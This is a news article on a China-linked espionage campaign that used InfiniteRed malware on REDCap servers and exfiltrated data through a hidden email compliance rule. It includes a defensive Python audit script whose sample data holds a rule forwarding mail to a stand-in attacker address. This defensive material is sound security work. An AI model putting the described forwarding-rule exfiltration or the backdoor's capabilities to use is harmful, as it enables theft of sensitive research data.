China-Linked Hackers Exploit REDCap Servers, Steal Medical Research with 'InfiniteRed' Malware
A sophisticated China-linked espionage campaign, attributed to **UNC6508**, has been uncovered targeting **REDCap** servers within a North American medical institution. The attackers deployed custom malware dubbed **InfiniteRed** to exfiltrate sensitive medical and scientific research data, remaining undetected in the victim's network for over a year.
A new report from **Google Threat Intelligence Group (GTIG)** details a long-running espionage campaign by a China-linked threat actor, **UNC6508**. The group successfully breached **REDCap** servers at a North American medical research institution, stealing sensitive data for over a year.
**REDCap** is a widely adopted platform for building and managing databases and surveys in medical and scientific research, adhering to relevant regulatory standards.
### Initial Compromise and Persistence
While the precise initial access vector remains unconfirmed, researchers observed **UNC6508** probing older, vulnerable versions of **REDCap**. The compromise of the medical research organization occurred in September 2023, with malicious activity continuing through November 2025.
Three months after initial access, the attackers deployed **InfiniteRed**, a custom malware specifically designed for **REDCap** systems. This malware's components were hidden by trojanizing the server's system files.
### The InfiniteRed Malware Suite
**InfiniteRed** comprises three main components:
* A persistence/update module
* A credential harvester
* A backdoor

The credential harvester actively captures usernames and passwords submitted through **REDCap** login pages. These stolen credentials are then encrypted and stored in local **REDCap** database tables for later retrieval.
The backdoor, which receives commands via HTTP cookies, grants **UNC6508** extensive control over the compromised server, including the ability to:
* Execute shell commands
* Upload and download files
* Run arbitrary SQL queries
* Retrieve and delete stolen credential records
* Access system and database information
### Novel Data Exfiltration Techniques
In a notable departure from typical China-linked threat actor tactics, **UNC6508** utilized legitimate 'content compliance rules' within cloud-based enterprise productivity tools for data exfiltration. After gaining administrator access, the group created a rule named 'Patriot.'
This rule was configured to scan the organization's communications for specific keywords, content patterns, email addresses, and phone numbers. Any matches were then automatically forwarded as a blind carbon copy (BCC) to '[email protected]', an address since disabled by **Google**.

The keywords used for exfiltration were highly targeted, focusing on medical research, advanced technology, military topics, and geo-strategic policy, indicating a clear intelligence-gathering objective.
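A defender-side check for the exfiltration technique described above, added here as an example and not part of the GTIG report: it audits an exported list of content compliance rules and flags any rule that BCCs matches to an address outside the organization's own domains. The JSON shape, the rule names other than 'Patriot', the addresses and the domains are constructed assumptions, not the vendor's real export format.

```python
import json

# Constructed sample export of content compliance rules (hypothetical shape,
# not a real vendor format). The 'Patriot' rule mirrors the reported behaviour:
# keyword matching with BCC forwarding to an external mailbox.
SAMPLE_RULES_JSON = """
[
  {"name": "Patriot",
   "match": {"keywords": ["clinical trial", "molecular", "readiness"]},
   "actions": {"bcc": ["collector@attacker.example"]}},
  {"name": "Legal hold",
   "match": {"keywords": ["subpoena"]},
   "actions": {"bcc": ["legal-archive@example-hospital.org"]}},
  {"name": "Block executables",
   "match": {"attachments": ["exe"]},
   "actions": {"quarantine": true}}
]
"""

# Domains the organization actually owns (assumed for this example).
ORG_DOMAINS = {"example-hospital.org"}


def external_bcc_rules(rules_json, org_domains):
    """Return (rule name, recipient, keyword count) for every BCC action
    whose recipient domain is not one of the organization's own domains."""
    findings = []
    for rule in json.loads(rules_json):
        actions = rule.get("actions", {})
        keywords = rule.get("match", {}).get("keywords", [])
        for addr in actions.get("bcc", []):
            # Split on the last '@' so display names or quoted local parts
            # do not confuse the domain extraction.
            domain = addr.rsplit("@", 1)[-1].strip().lower()
            if domain not in {d.lower() for d in org_domains}:
                findings.append((rule["name"], addr, len(keywords)))
    return findings


if __name__ == "__main__":
    for name, addr, n_keywords in external_bcc_rules(SAMPLE_RULES_JSON, ORG_DOMAINS):
        print(f"review rule {name!r}: BCC to external {addr} ({n_keywords} keywords)")
```

Run it against a real rule export once the export is normalized to the same fields; any hit deserves review of who created the rule and when.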
### Operational Security and Impact
**GTIG** observed a high level of operational security throughout the campaign, including the use of US-based residential proxy infrastructure, compromised routers, virtual private servers (VPS), credential replay, and dedicated infrastructure for data exfiltration.
**Google** has notified multiple organizations in the U.S. and Canada that were found to be compromised with the **InfiniteRed** malware. These organizations span critical research areas, from molecular discovery and clinical drug trials to state-level public health policy and military readiness.
### Recommendations for Defense
To mitigate similar threats, **REDCap** administrators are strongly advised to:
* Upgrade their instances to the latest available versions and remove any legacy deployments.
* Implement Multi-Factor Authentication (MFA) or 2-Step Verification (2SV) on all high-privilege accounts.
* Consider using Device Bound Session Credentials (DBSC) to prevent session hijacking.
**GTIG**'s report includes **YARA** rules and Indicators of Compromise (IoCs) to assist security teams in scanning their environments for **InfiniteRed** malware infections.